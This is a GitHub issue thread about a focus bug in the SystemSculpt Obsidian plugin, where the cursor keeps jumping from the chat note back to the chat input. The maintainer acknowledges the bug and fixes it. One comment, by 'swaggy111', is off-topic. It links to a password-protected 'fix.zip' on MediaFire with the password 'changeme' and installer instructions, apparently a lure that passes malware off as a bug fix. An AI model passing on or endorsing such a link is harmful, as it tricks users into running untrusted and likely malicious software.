### ISSUE TITLE
Cursor focus jumps from chat-note back to chat input box

### ISSUE THREAD

**Issue by ChrisBBBB** [SystemSculpt/obsidian-systemsculpt-ai#55]
I think most people would treat this as a bug. What I have observed is that if I'm in a SystemSculpt chat and then pull up the chat note and then manually edit in the chat note, the system doesn't allow my cursor to remain in the chat note for more than a few seconds. it pulls the cursor focus back to the input box in the chat pane. 

The example here is I was recently using the chat to develop some code and as we know AI is very good at generating code but I wanted to first of all change the way that it was handling the code block markers and then add additional documentation into the code. It's really difficult to type for more than a few key stokes. If you pause slightly in your typing, next time you look up you find the cursors in the chat input box instead of where it was. I think this only happens when you're editing in the chat note md. I hope others can replicate this. 

Thanks.

Here's an example of me typing 'The cat sat on the mat', see how it jumps from note to chat pane: 
![image](https://github.com/user-attachments/assets/59d082e5-60a9-49b1-b62a-9565c4a2b3a6)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SystemSculpt** [comment]
Ah, I see the bug you are talking about - this was initially meant to be a feature where when you open up a chat history note, it will pop you right into the chat focus so you can start typing on it right away, but as time has told so far for me too, it's more annoying than helpful - I will fix this in the next update, will close this when it's implemented as a fix. Thanks!

**Comment by ChrisBBBB** [comment]
This is pretty much like real-time support, thanks so much. I see what you were aiming for and I would agree that the first time it would be useful to have focus in the chat box; but not once that initial opening input has happened. Once the conversation has got underway the user should be in control. Many thanks for your work Mike.

**Comment by SystemSculpt** [comment]
Fixed in today's update (live in a few hours), closing! Thanks for the enhancement suggestion, cheers.
